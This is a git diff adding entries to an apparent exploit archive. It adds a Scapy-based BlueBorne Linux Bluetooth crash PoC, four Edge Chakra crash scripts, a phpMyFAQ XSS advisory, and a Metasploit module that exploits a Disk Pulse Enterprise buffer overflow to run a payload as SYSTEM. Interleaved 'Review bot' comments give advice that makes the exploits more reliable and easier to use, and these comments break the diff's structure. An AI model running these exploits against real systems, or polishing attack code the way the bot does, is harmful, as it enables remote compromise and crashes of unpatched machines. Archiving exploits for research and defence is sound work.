diff --git a/files.csv b/files.csv
index 93713f778..0e8c0389d 100644
--- a/files.csv
+++ b/files.csv
@@ -5680,6 +5680,11 @@ id,file,description,date,author,platform,type,port
 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
 42759,platforms/windows/dos/42759.html,"Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read",2017-09-19,"Google Security Research",windows,dos,0
+42762,platforms/linux/dos/42762.txt,"Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC)",2017-09-21,"Marcin Kozlowski",linux,dos,0
+42763,platforms/windows/dos/42763.html,"Microsoft Edge - Chakra Incorrectly Parses Object Patterns",2017-09-21,"Google Security Research",windows,dos,0
+42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0
+42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0
+42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15842,6 +15847,7 @@ id,file,description,date,author,platform,type,port
 42725,platforms/windows/remote/42725.rb,"Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)",2017-09-14,"James Fitts",windows,remote,69
 42726,platforms/hardware/remote/42726.py,"Astaro Security Gateway 7 - Remote Code Execution",2017-09-13,"Jakub Palaczynski",hardware,remote,0
 42753,platforms/multiple/remote/42753.txt,"Tecnovision DLX Spot - SSH Backdoor",2017-05-19,"Simon Brannstrom",multiple,remote,0
+42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38537,3 +38543,4 @@ id,file,description,date,author,platform,type,port
 42752,platforms/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection",2017-09-15,8bitsec,php,webapps,0
 42754,platforms/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-19,"Simon Brannstrom",php,webapps,0
 42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",php,webapps,0
+42761,platforms/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting",2017-09-21,"Ishaq Mohammed",php,webapps,0
diff --git a/platforms/linux/dos/42762.txt b/platforms/linux/dos/42762.txt
new file mode 100755
index 000000000..0a5eb101c
--- /dev/null
+++ b/platforms/linux/dos/42762.txt
@@ -0,0 +1,297 @@ +# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized - +DoS (Crash) only +# Date: 09/21/2017 +# Exploit Author: Marcin Kozlowski +# Version: Kernel version v3.3-rc1, and thus affects all version from there on +# Tested on: Linux 4.4.0-93-generic #116 +# CVE : CVE-2017-1000251 + +# Provided for legal security research and testing purposes ONLY. + + + +Proof of Concept - Crash Only - Unarmed/Unweaponized/No Payload + +After reading tons of Documentation and Protocol specifications. + + +1) Install Scapy + +https://github.com/secdev/scapy + + +Add/Replace these requests and responses in Bluetooth Protocol stack to these: + + +scapy/layers/bluetooth.py + +class L2CAP_ConfReq(Packet): + name = "L2CAP Conf Req" + fields_desc = [ LEShortField("dcid",0), + LEShortField("flags",0), + ByteField("type",0), + ByteField("length",0), + ByteField("identifier",0), + ByteField("servicetype",0), + LEShortField("sdusize",0), + LEIntField("sduarrtime",0), + LEIntField("accesslat",0), + LEIntField("flushtime",0), + ] + + + +class L2CAP_ConfResp(Packet): + name = "L2CAP Conf Resp" + fields_desc = [ LEShortField("scid",0), + LEShortField("flags",0), + LEShortField("result",0), + ByteField("type0",0), + ByteField("length0",0), + LEShortField("option0",0), + ByteField("type1",0), + ByteField("length1",0), + LEShortField("option1",0), + ByteField("type2",0), + ByteField("length2",0), + LEShortField("option2",0), + ByteField("type3",0), + ByteField("length3",0), + LEShortField("option3",0), + ByteField("type4",0), + ByteField("length4",0), + LEShortField("option4",0), + ByteField("type5",0), + ByteField("length5",0), + LEShortField("option5",0), + ByteField("type6",0), + ByteField("length6",0), + LEShortField("option6",0), + ByteField("type7",0), + ByteField("length7",0), + LEShortField("option7",0), + ByteField("type8",0), + ByteField("length8",0), + LEShortField("option8",0), + ByteField("type9",0), + ByteField("length9",0), + LEShortField("option9",0), + 
ByteField("type10",0), + ByteField("length10",0), + LEShortField("option10",0), + ByteField("type11",0), + ByteField("length11",0), + LEShortField("option11",0), + ByteField("type12",0), + ByteField("length12",0), + LEShortField("option12",0), + ByteField("type13",0), + ByteField("length13",0), + LEShortField("option13",0), + ByteField("type14",0), + ByteField("length14",0), + LEShortField("option14",0), + ByteField("type15",0), + ByteField("length15",0), + LEShortField("option15",0), + ByteField("type16",0), + ByteField("length16",0), + LEShortField("option16",0), + ByteField("type17",0), + ByteField("length17",0), + LEShortField("option17",0), + ByteField("type18",0), + ByteField("length18",0), + LEShortField("option18",0), + ByteField("type19",0), + ByteField("length19",0), + LEShortField("option19",0), + ByteField("type20",0), + ByteField("length20",0), + LEShortField("option20",0), + ByteField("type21",0), + ByteField("length21",0), + LEShortField("option21",0), + ByteField("type22",0), + ByteField("length22",0), + LEShortField("option22",0), + ByteField("type23",0), + ByteField("length23",0), + LEShortField("option23",0), + ByteField("type24",0), + ByteField("length24",0), + LEShortField("option24",0), + ByteField("type25",0), + ByteField("length25",0), + LEShortField("option25",0), + ByteField("type26",0), + ByteField("length26",0), + LEShortField("option26",0), + ByteField("type27",0), + ByteField("length27",0), + LEShortField("option27",0), + ByteField("type28",0), + ByteField("length28",0), + LEShortField("option28",0), + ByteField("type29",0), + ByteField("length29",0), + LEShortField("option29",0), + ByteField("type30",0), + ByteField("length30",0), + LEShortField("option30",0), + ByteField("type31",0), + ByteField("length31",0), + LEShortField("option31",0), + ByteField("type32",0), + ByteField("length32",0), + LEShortField("option32",0), + ByteField("type33",0), + ByteField("length33",0), + LEShortField("option33",0), + ByteField("type34",0), + 
ByteField("length34",0), + LEShortField("option34",0), + ByteField("type35",0), + ByteField("length35",0), + LEShortField("option35",0), + ByteField("type36",0), + ByteField("length36",0), + LEShortField("option36",0), + ByteField("type37",0), + ByteField("length37",0), + LEShortField("option37",0), + ByteField("type38",0), + ByteField("length38",0), + LEShortField("option38",0), + ByteField("type39",0), + ByteField("length39",0), + LEShortField("option39",0), + ByteField("type40",0), + ByteField("length40",0), + LEShortField("option40",0), + ByteField("type41",0), + ByteField("length41",0), + LEShortField("option41",0), + ByteField("type42",0), + ByteField("length42",0), + LEShortField("option42",0), + ByteField("type43",0), + ByteField("length43",0), + LEShortField("option43",0), + ByteField("type44",0), + ByteField("length44",0), + LEShortField("option44",0), + ByteField("type45",0), + ByteField("length45",0), + LEShortField("option45",0), + ByteField("type46",0), + ByteField("length46",0), + LEShortField("option46",0), + ByteField("type47",0), + ByteField("length47",0), + LEShortField("option47",0), + ByteField("type48",0), + ByteField("length48",0), + LEShortField("option48",0), + ByteField("type49",0), + ByteField("length49",0), + LEShortField("option49",0), + ByteField("type50",0), + ByteField("length50",0), + LEShortField("option50",0), + ByteField("type51",0), + ByteField("length51",0), + LEShortField("option51",0), + ByteField("type52",0), + ByteField("length52",0), + LEShortField("option52",0), + ByteField("type53",0), + ByteField("length53",0), + LEShortField("option53",0), + ByteField("type54",0), + ByteField("length54",0), + LEShortField("option54",0), + ByteField("type55",0), + ByteField("length55",0), + LEShortField("option55",0), + ByteField("type56",0), + ByteField("length56",0), + LEShortField("option56",0), + ByteField("type57",0), + ByteField("length57",0), + LEShortField("option57",0), + ByteField("type58",0), + ByteField("length58",0), + 
LEShortField("option58",0), + ByteField("type59",0), + ByteField("length59",0), + LEShortField("option59",0), + ByteField("type60",0), + ByteField("length60",0), + LEShortField("option60",0), + ByteField("type61",0), + ByteField("length61",0), + LEShortField("option61",0), + ByteField("type62",0), + ByteField("length62",0), + LEShortField("option62",0), + ByteField("type63",0), + ByteField("length63",0), + LEShortField("option63",0), + ByteField("type64",0), + ByteField("length64",0), + LEShortField("option64",0), + ByteField("type65",0), + ByteField("length65",0), + LEShortField("option65",0), + ByteField("type66",0), + ByteField("length66",0), + LEShortField("option66",0), + ByteField("type67",0), + ByteField("length67",0), + LEShortField("option67",0), + ByteField("type68",0), + ByteField("length68",0), + LEShortField("option68",0), + ByteField("type69",0), + ByteField("length69",0), + LEShortField("option69",0), + ] + + +2) Exploit + + +bluebornexploit.py +------------------------ + +from scapy.all import * + +pkt = L2CAP_CmdHdr(code=4)/ +L2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff) + + +pkt1 = L2CAP_CmdHdr(code=5)/ 
+L2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2
000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000) + + +bt = BluetoothL2CAPSocket("00:1A:7D:DA:71:13") + +bt.send(pkt) +bt.send(pkt1) + + +bluetoothsrv.py +-------------------- + +from scapy.all import * + +bt = BluetoothL2CAPSocket("01:02:03:04:05:06") + +bt.recv() + + + + +DEMO: +https://imgur.com/a/zcvLb diff --git a/platforms/php/webapps/42761.txt b/platforms/php/webapps/42761.txt new file mode 100755 index 000000000..af517c350 --- /dev/null +++ b/platforms/php/webapps/42761.txt 
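Review bot: The header's affected range, `# Version: Kernel version v3.3-rc1, and thus affects all version from there on`, is open-ended, while the files.csv entry for this same file says `Linux Kernel <= 4.13.1`, and neither the header nor the text names the kernel release that carries the fix for CVE-2017-1000251; add a `# Fixed in: <fixed kernel version>` line (placeholder; take the value from the kernel changelog) so the two agree and the entry can be used for patch-level triage. The write-up also never says which of the two packets sent by bluebornexploit.py — the configuration request `pkt` or the configuration response `pkt1` carrying 70 option entries — is the one that crashes the receiver, nor which kernel subsystem parses it; one sentence under "Proof of Concept" stating that would save a reader from reverse-engineering it out of the 200-line field list. Minor: `affects all version` should read `affects all versions`.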
@@ -0,0 +1,38 @@
+# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
+# Vendor Homepage: http://www.phpmyfaq.de/
+# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
+# Exploit Author: Ishaq Mohammed
+# Contact: https://twitter.com/security_prince
+# Website: https://about.me/security-prince
+# Category: webapps
+# CVE: CVE-2017-14618
+
+1. Description
+
+Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ
+through 2.9.8 allows remote attackers to inject arbitrary web script or
+HTML via the Questions field in an "Add New FAQ" action.
+
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14618
+
+2. Proof of Concept
+
+Steps to Reproduce:
+
+ 1. Open the affected link "
+ http://localhost/phpmyfaq/admin/?action=editentry" with logged in user
+ with administrator privileges
+ 2. Enter the xss link in the
+ “Questions”
+ 3. Save the FAQ
+ 4. Login using any other user or simply click on the phpMyFAQ on the
+ top-right hand side of the web portal
+ 5. Click on the latest FAQ added
+ 6. Hover around the name "xss link"
+
+
+3. Solution:
+
+The issue is now patched by the vendor
+https://github.com/thorsten/phpMyFAQ/commit/30b0025e19bd95ba28f4eff4d259671e7bb6bb86
+
diff --git a/platforms/windows/dos/42763.html b/platforms/windows/dos/42763.html
new file mode 100755
index 000000000..769bcba3a
--- /dev/null
+++ b/platforms/windows/dos/42763.html
@@ -0,0 +1,22 @@
+
+
+function f() {
+ ({
+ a: {
+ b = 0x1111,
+ c = 0x2222,
+ }.c = 0x3333
+ } = {});
+}
+
+f();
diff --git a/platforms/windows/dos/42764.html b/platforms/windows/dos/42764.html
new file mode 100755
index 000000000..f8c35b72a
--- /dev/null
+++ b/platforms/windows/dos/42764.html
@@ -0,0 +1,85 @@
+
+
+let h = function f(a0 = (function () {
+ a0;
+ a1;
+ a2;
+ a3;
+ a4;
+ a5;
+ a6;
+ a7 = 0x99999; // oob write
+
+ with ({});
+})(), a1, a2, a3, a4, a5, a6, a7) {
+ function g() {
+ f;
+ }
+};
+
+for (let i = 0; i < 0x10000; i++) {
+ h();
+}
diff --git a/platforms/windows/dos/42765.html b/platforms/windows/dos/42765.html
new file mode 100755
index 000000000..5d77290d4
--- /dev/null
+++ b/platforms/windows/dos/42765.html
@@ -0,0 +1,36 @@
+
+
+function f() {
+ {
+ let i;
+ function g() {
+ i;
+ }
+
+ try {
+ throw 1;
+ } catch ({e = eval('dd')}) {
+ }
+ }
+}
+
+f();
\ No newline at end of file
diff --git a/platforms/windows/dos/42766.html b/platforms/windows/dos/42766.html
new file mode 100755
index 000000000..9bb969a6d
--- /dev/null
+++ b/platforms/windows/dos/42766.html
@@ -0,0 +1,47 @@
+
+
+function Module() {
+ 'use asm';
+
+ function f() {
+ }
+
+ return f;
+}
+
+function recur() {
+ try {
+ recur();
+ } catch (e) {
+ Module(1);
+ }
+}
+
+recur();
\ No newline at end of file
diff --git a/platforms/windows/remote/42767.rb b/platforms/windows/remote/42767.rb
new file mode 100755
index 000000000..462b9ea7e
--- /dev/null
+++ b/platforms/windows/remote/42767.rb
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Seh
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',
+ 'Description' => %q(
+ This module exploits an SEH buffer overflow in Disk Pulse Enterprise
+ 9.9.16. If a malicious user sends a crafted HTTP GET request
+ it is possible to execute a payload that would run under the Windows
+ NT AUTHORITY\SYSTEM account.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Chance Johnson', # msf module - albatross@loftwing.net
+ 'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '42560' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread'
+ },
+ 'Platform' => 'win',
+ 'Payload' =>
+ {
+ 'EncoderType' => "alpha_mixed",
+ 'BadChars' => "\x00\x0a\x0d\x26"
+ },
+ 'Targets' =>
+ [
+ [ 'Disk Pulse Enterprise 9.9.16',
+ {
+ 'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
+ 'Offset' => 2492
+ }]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Aug 25 2017',
+ 'DefaultTarget' => 0))
+
+ register_options([Opt::RPORT(80)])
+ end
+
+ def check
+ res = send_request_cgi(
+ 'uri' => '/',
+ 'method' => 'GET'
+ )
+
+ if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
+ return Exploit::CheckCode::Appears
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ connect
+
+ print_status("Generating exploit...")
+ exp = payload.encoded
+ exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
+ exp << generate_seh_record(target.ret)
+ exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
+ exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
+ exp << 'B' * (5000 - exp.length) # padding
+
+ print_status("Sending exploit...")
+
+ send_request_cgi(
+ 'uri' => '/../' + exp,
+ 'method' => 'GET',
+ 'host' => '4.2.2.2',
+ 'connection' => 'keep-alive'
+ )
+
+ handler
+ disconnect
+ end
+end
\ No newline at end of file
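Review bot: The padding arithmetic in `exploit` silently assumes the encoded payload fits in `target['Offset']` bytes, but the `Payload` hash declares no size limit, so a larger payload makes `'A' * (target['Offset'] - payload.encoded.length)` raise ArgumentError (negative argument) from `String#*` instead of being rejected when the payload is generated; add `'Space' => 2492` next to `'BadChars'` so the framework enforces the bound that `Offset` already implies. The trailing `'B' * (5000 - exp.length)` has the same negative-count failure mode if the record ever grows past 5000 bytes and would benefit from the same guard or a comment stating the 5000-byte assumption. `payload.encoded` is also evaluated twice (once to seed `exp`, once for `.length`); since `exp` starts as exactly that string, `exp.length` at that point expresses the intent more directly.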